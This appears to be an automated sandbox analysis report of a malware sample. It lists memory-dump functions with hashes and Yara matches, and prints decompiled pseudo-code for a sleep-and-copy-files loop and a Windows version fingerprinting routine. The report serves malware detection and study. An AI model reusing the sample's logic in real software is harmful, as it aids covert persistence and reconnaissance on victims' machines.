                                    • Instruction Fuzzy Hash: 5EE00274D04608EFCB04DF99C98889DBBB5AF89320B25C295E865A73A5D730AE419A80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 058B0000, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 058B0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623680627.00000000058B0000.00000040.00000001.sdmp, Offset: 058B0000, based on PE: false
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: c7029126856fc18a90b10eb8f6b66cf6dfe98ba5d5677cc42749acb8f4f96d87
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 61E00A74D04608EFCB04DF99C54889DBBB5AF49320B25C295E865973A5D7309E419A40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 04F60000, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 04F60026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.621483040.0000000004F60000.00000040.00000001.sdmp, Offset: 04F60000, based on PE: false
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: b270842f4330b665a0ae8cb82e5050ebe7dadf3c51feb8eedbf0113eeaff8a57
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: C5E00274D04608EFCB04DF99C98889DBBB5AF89320B25C295E865A73A5D730AE419A80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 057C0000, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 057C0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623511727.00000000057C0000.00000040.00000001.sdmp, Offset: 057C0000, based on PE: false
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: 9fc836f22d5adc3682a85b8cd94ac9b694d140d122a19206f8b3beb58260fd7d
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 72E00A74D04608EFCB04DF99C54889DBBB5AF49320B25C295E865973A5D7309E419A80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 05570000, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 05570026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623129523.0000000005570000.00000040.00000001.sdmp, Offset: 05570000, based on PE: false
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: ae8fc1ac821e2202df0b9a1dd35f99cc18617dab889f93737cbe80bdb9692bf0
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 3FE00274D04608EFCB04DF99C98889DBBB5AF89320B25C295E865A73A5D730AE419E80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 04E40000, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 04E40026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.620641863.0000000004E40000.00000040.00000001.sdmp, Offset: 04E40000, based on PE: false
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: 7858acfb835fe4669736da2537f612504c283f7e3ab97eaad4bede2a604049da
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 65E00A74D04608EFCB04DF99C54889DBBB5AF89320B25C295E965973A5D730AE419A40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 052A0000, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 052A0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.622491432.00000000052A0000.00000040.00000001.sdmp, Offset: 052A0000, based on PE: false
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: b008bcd4173c86d40940a7d5f4970cc7f54954a8cb8f0e9b94efed51c1aa89e6
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 6AE09A74D00608EFCB04CF99C44889DFBB5AF48320B20C291E825973A5D7309E419A40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24011308, Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 75%
                                    			E24011308(void* __eax) {
				signed int _t2;
				void* _t4;
				signed int _t5;

				_t2 =  *0x2405704c; // 0x0
				_t4 =  *0x2405b59c; // 0x3380000
				_t5 = HeapFree(_t4, _t2 & 0x00000001, __eax); // executed
				asm("sbb eax, eax");
				return  ~_t5 & 0x0000007f;
			}






                                    0x2401130c
                                    0x24011315
                                    0x2401131b
                                    0x24011323
                                    0x2401132b

                                    APIs
                                    • HeapFree.KERNEL32(03380000,00000000), ref: 2401131B
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: f0c06279d0b994ed06d1c024c4a25fd67197e3b5f152ea92e99a30f4722968e4
                                    • Instruction ID: 6c08dce1daa82f61513e78823dc41ea4d7efafefdee2a7e001a5c237e3fa9e19
                                    • Opcode Fuzzy Hash: f0c06279d0b994ed06d1c024c4a25fd67197e3b5f152ea92e99a30f4722968e4
                                    • Instruction Fuzzy Hash: FBC08CF32206019B8F108BECCCC2E1762DCF31C2087106420F50CDB101C12EE8C09620
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2405251C, Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E2405251C() {
				signed int* _t5;
				void* _t8;
				void* _t11;
				void* _t12;

				E24013088(0x2405aaa8);
				E240178C8(E24052464, 0, 0);
				L1:
				_t5 =  *0x2405ab7c; // 0x2405b930
				Sleep( *_t5 * 0xea60); // executed
				E240500AC(_t8, 0, _t11, _t12);
				goto L1;
			}







                                    0x24052521
                                    0x2405252f
                                    0x24052534
                                    0x24052534
                                    0x24052540
                                    0x24052545
                                    0x00000000

                                    APIs
                                      • Part of subcall function 240178C8: CreateThread.KERNEL32(00000000,00000000,Function_00042464,00000000,00000000), ref: 240178D6
                                      • Part of subcall function 240178C8: SetThreadPriority.KERNEL32(00000000,00000000,00000000,?,?,24052534), ref: 240178DF
                                    • Sleep.KERNEL32(2405B930), ref: 24052540
                                      • Part of subcall function 240500AC: GetTickCount.KERNEL32 ref: 24050124
                                      • Part of subcall function 240500AC: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 24050162
                                      • Part of subcall function 240500AC: SetFileAttributesA.KERNEL32(00000000,00000080,.txt,?,00000000,00000000,?,00000000,240502D7,?,?,00000000,00000000), ref: 2405016D
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: FileThread$AttributesCopyCountCreatePrioritySleepTick
                                    • String ID:
                                    • API String ID: 696888678-0
                                    • Opcode ID: bd4957d9d874c1714997d2d643c2542b0f38b3c574f5fdb879ee39a40b270e59
                                    • Instruction ID: b1ffadd8d17362f08309d5e16d3babc1e98b1cac085926286dd779b12b47022f
                                    • Opcode Fuzzy Hash: bd4957d9d874c1714997d2d643c2542b0f38b3c574f5fdb879ee39a40b270e59
                                    • Instruction Fuzzy Hash: 93D0C920B4420056B60EEB79949080D2685FFAA10C705D85D6405AE068C978E9C58E22
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 05A80000, Relevance: .0, Instructions: 17COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.624058360.0000000005A80000.00000040.00000001.sdmp, Offset: 05A80000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a8f87fc558e2f538fd351bdfc49e2c6aa18e45c6a6d2c8ec1415aa36aaa266a9
                                    • Instruction ID: 18b5e61e04c7bcae5a7a9f8a09946595db22e2a0f492063f86ebefdf2a899b08
                                    • Opcode Fuzzy Hash: a8f87fc558e2f538fd351bdfc49e2c6aa18e45c6a6d2c8ec1415aa36aaa266a9
                                    • Instruction Fuzzy Hash: 33D01275914208EFDB04CF54D84589EBBF5EB44320F20C165E914973A0E731AE509A44
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 2401F870, Relevance: 100.5, APIs: 4, Strings: 53, Instructions: 748COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 94%
                                    			E2401F870(char* __eax, void* __ebx, char __edi, void* __esi) {
				char _v8;
				struct _SYSTEM_INFO _v44;
				char _v46;
				signed int _v47;
				signed int _v48;
				signed int _v50;
				signed int _v52;
				short _v306;
				struct _OSVERSIONINFOW _v328;
				char _v332;
				char _v336;
				char* _v340;
				char _v344;
				char _v348;
				void* _v352;
				void* _v356;
				void* _v360;
				void* _v364;
				void* _v368;
				void* _v372;
				void* _v376;
				void* _v380;
				void* _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				void* _v404;
				void* _v408;
				void* _v412;
				void* _v416;
				void* _v420;
				void* _v424;
				void* _v428;
				char _v432;
				char _v436;
				char _v440;
				char _v444;
				char _v448;
				char _v452;
				char _t402;
				void* _t405;
				intOrPtr _t414;
				signed int _t460;
				intOrPtr _t484;
				intOrPtr _t491;
				char _t522;
				void* _t523;
				intOrPtr _t540;
				char* _t586;
				intOrPtr _t588;
				intOrPtr _t589;
				void* _t598;

				_t584 = __edi;
				_t588 = _t589;
				_t523 = 0x38;
				goto L1;
				L5:
				if(_v328.dwOSVersionInfoSize == 0) {
					L123:
					_v348 =  *(_t586 + 0x20);
					_v344 = 0;
					_v340 =  *(_t586 + 0x24);
					_v336 = 0;
					E24015C78(0x24020b24, _t522, 1,  &_v348, _t584, _t586,  &_v444);
					E240130DC(_t586 + 0xc, _v444);
					_v348 =  *(_t586 + 8);
					_v344 = 0xb;
					_v340 =  *((intOrPtr*)(_t586 + 0x18));
					_v336 = 0;
					E24015C78("%s (Build: %d", _t522, 1,  &_v348, _t584, _t586,  &_v448);
					E240130DC(_t586 + 4, _v448);
					if( *(_t586 + 0x20) != 0) {
						_v440 =  *(_t586 + 0xc);
						_v436 = 0xb;
						E24015C78(" - Service Pack: %s", _t522, 0,  &_v440, _t584, _t586,  &_v452);
						E24013344(_t586 + 4, _v452);
					}
					E24013344(_t586 + 4, 0x24020b68);
					_pop(_t540);
					 *[fs:eax] = _t540;
					_push(0x240205d7);
					E240130AC( &_v452, 3);
					E240130AC( &_v432, 0x15);
					return E24013088( &_v332);
				} else {
					 *(_t586 + 0x10) = _v328.dwMajorVersion;
					 *((intOrPtr*)(_t586 + 0x14)) = _v328.dwMinorVersion;
					 *((intOrPtr*)(_t586 + 0x18)) = _v328.dwBuildNumber;
					if(_v328.dwPlatformId != 2 || _v46 == 1) {
						_t402 = 0;
					} else {
						_t402 = 1;
					}
					 *_t586 = _t402;
					if(_t522 != 0) {
						 *(_t586 + 0x20) = _v52 & 0x0000ffff;
						 *(_t586 + 0x24) = _v50 & 0x0000ffff;
					}
					GetSystemInfo( &_v44);
					_t584 = _v328.dwPlatformId;
					_t405 = _t584 - 1;
					_t598 = _t405;
					if(_t598 < 0) {
						E240130DC(_t586 + 8, "Windows 3.1");
						goto L123;
					} else {
						if(_t598 == 0) {
							if( *(_t586 + 0x10) != 4 ||  *((intOrPtr*)(_t586 + 0x14)) != 0) {
								if( *(_t586 + 0x10) != 4 ||  *((intOrPtr*)(_t586 + 0x14)) != 0xa || _v306 != 0x41) {
									if( *(_t586 + 0x10) != 4 ||  *((intOrPtr*)(_t586 + 0x14)) != 0xa) {
										if( *(_t586 + 0x10) == 4 &&  *((intOrPtr*)(_t586 + 0x14)) == 0x5a) {
											E240130DC(_t586 + 8, "Windows ME");
										}
									} else {
										E240130DC(_t586 + 8, "Windows 98");
									}
								} else {
									E240130DC(_t586 + 8, "Windows 98 SE");
								}
							} else {
								_t414 = _v306;
								if(_t414 == 0x43 || _t414 == 0x42) {
									E240130DC(_t586 + 8, "Windows 95 (Release 2)");
								} else {
									E240130DC(_t586 + 8, "Windows 95");
								}
							}
							goto L123;
						}
						if(_t405 == 1) {
							if(_v46 != 1) {
								if(_v328.dwMajorVersion != 6 || _v328.dwMinorVersion != 0) {
									if(_v328.dwMajorVersion != 5 || _v328.dwMinorVersion != 2) {
										if(_v328.dwMajorVersion != 5 || _v328.dwMinorVersion != 2) {
											if(_v328.dwMajorVersion != 5 || _v328.dwMinorVersion != 0) {
												if(_t522 == 0 || (_v48 & 0x00000080) == 0) {
													if(_t522 == 0 || (_v48 & 0x00000002) == 0) {
														if(_t522 == 0 || (_v47 & 0x00000004) == 0) {
															E240130DC(_t586 + 8, "Windows NT 4.0 Server");
														} else {
															E240130DC(_t586 + 8, "Windows NT 4.0 Server Web Edition");
														}
													} else {
														E240130DC(_t586 + 8, "Windows NT 4.0 Server Enterprise");
													}
												} else {
													E240130DC(_t586 + 8, "Windows NT 4.0 Server Datacenter");
												}
											} else {
												if(_t522 == 0 || (_v48 & 0x00000080) == 0) {
													if(_t522 == 0 || (_v48 & 0x00000002) == 0) {
														if(_t522 == 0 || (_v47 & 0x00000004) == 0) {
															E240130DC(_t586 + 8, "Windows 2000 Server");
														} else {
															E240130DC(_t586 + 8, "Windows 2000 Server Web Edition");
														}
													} else {
														E240130DC(_t586 + 8, "Windows 2000 Server Enterprise");
													}
												} else {
													E240130DC(_t586 + 8, "Windows 2000 Server Datacenter");
												}
											}
										} else {
											if(_t522 == 0 || _v48 != 0x8000) {
												if(GetSystemMetrics(0x59) == 0) {
													E240130DC(_t586 + 8, "Windows 2003 Server (Release 2)");
												} else {
													E240130DC(_t586 + 8, "Windows 2003 Server");
												}
											} else {
												E240130DC(_t586 + 8, "Windows Home Server");
											}
										}
									} else {
										if(_t522 == 0 || (_v48 & 0x00000080) == 0) {
											if(_t522 == 0 || (_v48 & 0x00000002) == 0) {
												if(_t522 == 0 || (_v47 & 0x00000004) == 0) {
													E240130DC(_t586 + 8, "Windows 2003 Server");
												} else {
													E240130DC(_t586 + 8, "Windows 2003 Server Web Edition");
												}
											} else {
												E240130DC(_t586 + 8, "Windows 2003 Server Enterprise");
											}
										} else {
											E240130DC(_t586 + 8, "Windows 2003 Server Datacenter");
										}
									}
									goto L123;
								} else {
									E240130DC(_t586 + 8, "Windows 2008");
									if( *0x24057124 == 0) {
										goto L123;
									}
									 *0x24057124(_v328.dwMajorVersion, _v328.dwMinorVersion, _v52 & 0x0000ffff, _v50 & 0x0000ffff,  &_v8);
									_t460 = _v8 + 0xfffffff9;
									if(_t460 > 0xa) {
										L79:
										E24013344(_t586 + 8, " Server (unknown edition)");
										goto L123;
									}
									switch( *((intOrPtr*)(_t460 * 4 +  &M24020016))) {
										case 0:
											_v348 =  *(_t586 + 8);
											_v344 = 0xb;
											_v340 = "Standard";
											_v336 = 0xb;
											E24015C78("%s %s Server", _t522, 1,  &_v348, _t584, _t586,  &_v400);
											E240130DC(_t586 + 8, _v400);
											goto L123;
										case 1:
											 &_v404 =  *(__esi + 8);
											_v348 =  *(__esi + 8);
											_v344 = 0xb;
											__eax = "Datacenter";
											_v340 = "Datacenter";
											_v336 = 0xb;
											__edx =  &_v348;
											__ecx = 1;
											"%s %s Server" = E24015C78("%s %s Server", __ebx, 1,  &_v348, __edi, __esi,  &_v404);
											__edx = _v404;
											__eax = __esi + 8;
											__eax = E240130DC(__esi + 8, __edx);
											goto L123;
										case 2:
											goto L79;
										case 3:
											 &_v408 =  *(__esi + 8);
											_v348 =  *(__esi + 8);
											_v344 = 0xb;
											__eax = "Enterprise";
											_v340 = "Enterprise";
											_v336 = 0xb;
											__edx =  &_v348;
											__ecx = 1;
											"%s %s Server" = E24015C78("%s %s Server", __ebx, 1,  &_v348, __edi, __esi,  &_v408);
											__edx = _v408;
											__eax = __esi + 8;
											__eax = E240130DC(__esi + 8, __edx);
											goto L123;
										case 4:
											 &_v412 =  *(__esi + 8);
											_v348 =  *(__esi + 8);
											_v344 = 0xb;
											__eax = "Datacenter";
											_v340 = "Datacenter";
											_v336 = 0xb;
											__edx =  &_v348;
											__ecx = 1;
											"%s %s Server" = E24015C78("%s %s Server", __ebx, 1,  &_v348, __edi, __esi,  &_v412);
											__edx = _v412;
											__eax = __esi + 8;
											__eax = E240130DC(__esi + 8, __edx);
											goto L123;
										case 5:
											 &_v416 =  *(__esi + 8);
											_v348 =  *(__esi + 8);
											_v344 = 0xb;
											__eax = "Standard";
											_v340 = "Standard";
											_v336 = 0xb;
											__edx =  &_v348;
											__ecx = 1;
											"%s %s Server" = E24015C78("%s %s Server", __ebx, 1,  &_v348, __edi, __esi,  &_v416);
											__edx = _v416;
											__eax = __esi + 8;
											__eax = E240130DC(__esi + 8, __edx);
											goto L123;
										case 6:
											 &_v420 =  *(__esi + 8);
											_v348 =  *(__esi + 8);
											_v344 = 0xb;
											__eax = "Enterprise";
											_v340 = "Enterprise";
											_v336 = 0xb;
											__edx =  &_v348;
											__ecx = 1;
											"%s %s Server" = E24015C78("%s %s Server", __ebx, 1,  &_v348, __edi, __esi,  &_v420);
											__edx = _v420;
											__eax = __esi + 8;
											__eax = E240130DC(__esi + 8, __edx);
											goto L123;
										case 7:
											 &_v424 =  *(__esi + 8);
											_v348 =  *(__esi + 8);
											_v344 = 0xb;
											__eax = "Enterprise IA64";
											_v340 = "Enterprise IA64";
											_v336 = 0xb;
											__edx =  &_v348;
											__ecx = 1;
											"%s %s Server" = E24015C78("%s %s Server", __ebx, 1,  &_v348, __edi, __esi,  &_v424);
											__edx = _v424;
											__eax = __esi + 8;
											__eax = E240130DC(__esi + 8, __edx);
											goto L123;
										case 8:
											 &_v428 =  *(__esi + 8);
											_v348 =  *(__esi + 8);
											_v344 = 0xb;
											__eax = 0x240208c0;
											_v340 = 0x240208c0;
											_v336 = 0xb;
											__edx =  &_v348;
											__ecx = 1;
											"%s %s Server" = E24015C78("%s %s Server", __ebx, 1,  &_v348, __edi, __esi,  &_v428);
											__edx = _v428;
											__eax = __esi + 8;
											__eax = E240130DC(__esi + 8, __edx);
											goto L123;
									}
								}
							}
							_t584 = _v328.dwMajorVersion;
							if(_t584 != 6) {
								if(_t584 != 5) {
									_v348 = _t584;
									_v344 = 0;
									_v340 = _v328.dwMinorVersion;
									_v336 = 0;
									E24015C78("Windows NT %d.%d", _t522, 1,  &_v348, _t584, _t586,  &_v396);
									E240130DC(_t586 + 8, _v396);
								} else {
									if(_v328.dwMinorVersion != 2 || _v44.dwOemId != 9) {
										if(_t522 == 0 || (_v47 & 0x00000002) == 0 || _v328.dwMinorVersion != 1) {
											if(_v328.dwMinorVersion != 1) {
												E240130DC(_t586 + 8, "Windows 2000 Professional");
											} else {
												E240130DC(_t586 + 8, "Windows XP Professional");
											}
										} else {
											E240130DC(_t586 + 8, "Windows XP Home");
										}
									} else {
										E240130DC(_t586 + 8, "Windows XP Professional x64");
									}
								}
								goto L123;
							}
							_t484 = _v328.dwMinorVersion;
							if(_t484 != 1) {
								if(_t484 == 0) {
									E240130DC(_t586 + 8, "Windows Vista");
								}
							} else {
								E240130DC(_t586 + 8, "Windows 7");
							}
							if( *0x24057124 == 0) {
								goto L123;
							} else {
								 *0x24057124(_v328.dwMajorVersion, _v328.dwMinorVersion, _v52 & 0x0000ffff, _v50 & 0x0000ffff,  &_v8);
								_t491 = _v8;
								if(_t491 > 0x1c) {
									L53:
									_v348 =  *(_t586 + 8);
									_v344 = 0xb;
									_v340 = "(unknown edition)";
									_v336 = 0xb;
									E24015C78(0x240206c0, _t522, 1,  &_v348, _t584, _t586,  &_v392);
									E240130DC(_t586 + 8, _v392);
									goto L123;
								}
								switch( *((intOrPtr*)( *(_t491 + 0x2401fac9) * 4 +  &M2401FAE6))) {
									case 0:
										goto L53;
									case 1:
										_v348 =  *(_t586 + 8);
										_v344 = 0xb;
										_v340 = "Ultimate";
										_v336 = 0xb;
										E24015C78(0x240206c0, _t522, 1,  &_v348, _t584, _t586,  &_v332);
										E240130DC(_t586 + 8, _v332);
										goto L123;
									case 2:
										 &_v352 =  *(__esi + 8);
										_v348 =  *(__esi + 8);
										_v344 = 0xb;
										__eax = "Home Basic";
										_v340 = "Home Basic";
										_v336 = 0xb;
										__edx =  &_v348;
										__ecx = 1;
										0x240206c0 = E24015C78(0x240206c0, __ebx, 1,  &_v348, __edi, __esi,  &_v352);
										__edx = _v352;
										__eax = __esi + 8;
										__eax = E240130DC(__esi + 8, __edx);
										goto L123;
									case 3:
										 &_v356 =  *(__esi + 8);
										_v348 =  *(__esi + 8);
										_v344 = 0xb;
										__eax = "Premium";
										_v340 = "Premium";
										_v336 = 0xb;
										__edx =  &_v348;
										__ecx = 1;
										0x240206c0 = E24015C78(0x240206c0, __ebx, 1,  &_v348, __edi, __esi,  &_v356);
										__edx = _v356;
										__eax = __esi + 8;
										__eax = E240130DC(__esi + 8, __edx);
										goto L123;
									case 4:
										 &_v360 =  *(__esi + 8);
										_v348 =  *(__esi + 8);
										_v344 = 0xb;
										__eax = "Enterprise";
										_v340 = "Enterprise";
										_v336 = 0xb;
										__edx =  &_v348;
										__ecx = 1;
										0x240206c0 = E24015C78(0x240206c0, __ebx, 1,  &_v348, __edi, __esi,  &_v360);
										__edx = _v360;
										__eax = __esi + 8;
										__eax = E240130DC(__esi + 8, __edx);
										goto L123;
									case 5:
										 &_v364 =  *(__esi + 8);
										_v348 =  *(__esi + 8);
										_v344 = 0xb;
										__eax = "Home Basic N";
										_v340 = "Home Basic N";
										_v336 = 0xb;
										__edx =  &_v348;
										__ecx = 1;
										0x240206c0 = E24015C78(0x240206c0, __ebx, 1,  &_v348, __edi, __esi,  &_v364);
										__edx = _v364;
										__eax = __esi + 8;
										__eax = E240130DC(__esi + 8, __edx);
										goto L123;
									case 6:
										 &_v368 =  *(__esi + 8);
										_v348 =  *(__esi + 8);
										_v344 = 0xb;
										__eax = "Business";
										_v340 = "Business";
										_v336 = 0xb;
										__edx =  &_v348;
										__ecx = 1;
										0x240206c0 = E24015C78(0x240206c0, __ebx, 1,  &_v348, __edi, __esi,  &_v368);
										__edx = _v368;
										__eax = __esi + 8;
										__eax = E240130DC(__esi + 8, __edx);
										goto L123;
									case 7:
										 &_v372 =  *(__esi + 8);
										_v348 =  *(__esi + 8);
										_v344 = 0xb;
										__eax = "Starter";
										_v340 = "Starter";
										_v336 = 0xb;
										__edx =  &_v348;
										__ecx = 1;
										0x240206c0 = E24015C78(0x240206c0, __ebx, 1,  &_v348, __edi, __esi,  &_v372);
										__edx = _v372;
										__eax = __esi + 8;
										__eax = E240130DC(__esi + 8, __edx);
										goto L123;
									case 8:
										 &_v376 =  *(__esi + 8);
										_v348 =  *(__esi + 8);
										_v344 = 0xb;
										__eax = "Business N";
										_v340 = "Business N";
										_v336 = 0xb;
										__edx =  &_v348;
										__ecx = 1;
										0x240206c0 = E24015C78(0x240206c0, __ebx, 1,  &_v348, __edi, __esi,  &_v376);
										__edx = _v376;
										__eax = __esi + 8;
										__eax = E240130DC(__esi + 8, __edx);
										goto L123;
									case 9:
										 &_v380 =  *(__esi + 8);
										_v348 =  *(__esi + 8);
										_v344 = 0xb;
										__eax = "Premium N";
										_v340 = "Premium N";
										_v336 = 0xb;
										__edx =  &_v348;
										__ecx = 1;
										0x240206c0 = E24015C78(0x240206c0, __ebx, 1,  &_v348, __edi, __esi,  &_v380);
										__edx = _v380;
										__eax = __esi + 8;
										__eax = E240130DC(__esi + 8, __edx);
										goto L123;
									case 0xa:
										 &_v384 =  *(__esi + 8);
										_v348 =  *(__esi + 8);
										_v344 = 0xb;
										__eax = "Enterprise N";
										_v340 = "Enterprise N";
										_v336 = 0xb;
										__edx =  &_v348;
										__ecx = 1;
										0x240206c0 = E24015C78(0x240206c0, __ebx, 1,  &_v348, __edi, __esi,  &_v384);
										__edx = _v384;
										__eax = __esi + 8;
										__eax = E240130DC(__esi + 8, __edx);
										goto L123;
									case 0xb:
										 &_v388 =  *(__esi + 8);
										_v348 =  *(__esi + 8);
										_v344 = 0xb;
										__eax = "Ultimate N";
										_v340 = "Ultimate N";
										_v336 = 0xb;
										__edx =  &_v348;
										__ecx = 1;
										0x240206c0 = E24015C78(0x240206c0, __ebx, 1,  &_v348, __edi, __esi,  &_v388);
										__edx = _v388;
										__eax = __esi + 8;
										__eax = E240130DC(__esi + 8, __edx);
										goto L123;
								}
							}
						} else {
							_v440 = _t584;
							_v436 = 0;
							E24015C78("Unknown Platform ID (%d)", _t522, 0,  &_v440, _t584, _t586,  &_v432);
							E240130DC(_t586 + 8, _v432);
							goto L123;
						}
					}
				}
				L1:
				_push(0);
				_push(0);
				_t523 = _t523 - 1;
				if(_t523 != 0) {
					goto L1;
				} else {
					_push(__edi);
					_t586 = __eax;
					_push(_t588);
					_push(0x240205d0);
					_push( *[fs:eax]);
					 *[fs:eax] = _t589;
					 *__eax = 0;
					E240130DC(__eax + 8, "Unknown");
					 *((intOrPtr*)(_t586 + 0x1c)) = 0;
					 *(_t586 + 0x10) = 0;
					 *((intOrPtr*)(_t586 + 0x14)) = 0;
					 *((intOrPtr*)(_t586 + 0x18)) = 0;
					 *(_t586 + 0x20) = 0;
					 *(_t586 + 0x24) = 0;
					 *_t586 = 0;
					 *((char*)(_t586 + 1)) = 0;
					_t522 = 1;
					_v328.dwOSVersionInfoSize = 0x11c;
					if(GetVersionExW( &_v328) == 0) {
						_t522 = 0;
						_v328.dwOSVersionInfoSize = 0x94;
						if(GetVersionExW( &_v328) == 0) {
							_v328.dwOSVersionInfoSize = 0;
						}
					}
					goto L5;
				}
			}
























































                                    0x2401f870
                                    0x2401f871
                                    0x2401f873
                                    0x2401f873
                                    0x2401f907
                                    0x2401f90e
                                    0x240204b9
                                    0x240204c3
                                    0x240204c9
                                    0x240204d3
                                    0x240204d9
                                    0x240204f0
                                    0x240204fe
                                    0x2402050d
                                    0x24020513
                                    0x2402051d
                                    0x24020523
                                    0x2402053a
                                    0x24020548
                                    0x24020551
                                    0x2402055d
                                    0x24020563
                                    0x24020577
                                    0x24020585
                                    0x24020585
                                    0x24020592
                                    0x24020599
                                    0x2402059c
                                    0x2402059f
                                    0x240205af
                                    0x240205bf
                                    0x240205cf
                                    0x2401f914
                                    0x2401f91a
                                    0x2401f923
                                    0x2401f92c
                                    0x2401f936
                                    0x2401f93e
                                    0x2401f942
                                    0x2401f942
                                    0x2401f942
                                    0x2401f944
                                    0x2401f948
                                    0x2401f94e
                                    0x2401f955
                                    0x2401f955
                                    0x2401f95c
                                    0x2401f961
                                    0x2401f969
                                    0x2401f969
                                    0x2401f96c
                                    0x2401f984
                                    0x00000000
                                    0x2401f96e
                                    0x2401f96e
                                    0x2401f992
                                    0x2401f9d5
                                    0x2401f9fd
                                    0x2401fa1b
                                    0x2401fa33
                                    0x2401fa33
                                    0x2401fa05
                                    0x2401fa0d
                                    0x2401fa0d
                                    0x2401f9e7
                                    0x2401f9ef
                                    0x2401f9ef
                                    0x2401f99a
                                    0x2401f99a
                                    0x2401f9a5
                                    0x2401f9b5
                                    0x2401f9bf
                                    0x2401f9c7
                                    0x2401f9c7
                                    0x2401f9a5
                                    0x00000000
                                    0x2401f992
                                    0x2401f971
                                    0x2401fa41
                                    0x2401ffb1
                                    0x240202e3
                                    0x2402035b
                                    0x240203ba
                                    0x2402042d
                                    0x24020446
                                    0x2402045f
                                    0x2402047e
